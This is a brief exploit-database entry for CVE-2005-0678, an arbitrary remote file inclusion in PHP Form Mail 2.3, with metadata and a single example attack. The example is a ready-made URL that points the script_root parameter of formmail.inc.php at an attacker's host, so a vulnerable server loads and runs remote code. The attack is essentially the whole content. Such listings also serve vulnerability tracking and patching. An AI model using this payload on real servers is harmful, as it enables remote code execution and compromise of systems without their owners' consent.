PHP Form Mail 2.3 - Arbitrary File Inclusion

EKU-ID: 8989	CVE: OSVDB-14572;CVE-2005-0678	OSVDB-ID:
Author: Filip Groszynski	Published: 2005-03-05	Verified:
Download:

Rating

☆☆☆☆☆

Example:

 if register_globals=on and allow_url_fopen=on:
   http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/

# milw0rm.com [2005-03-05]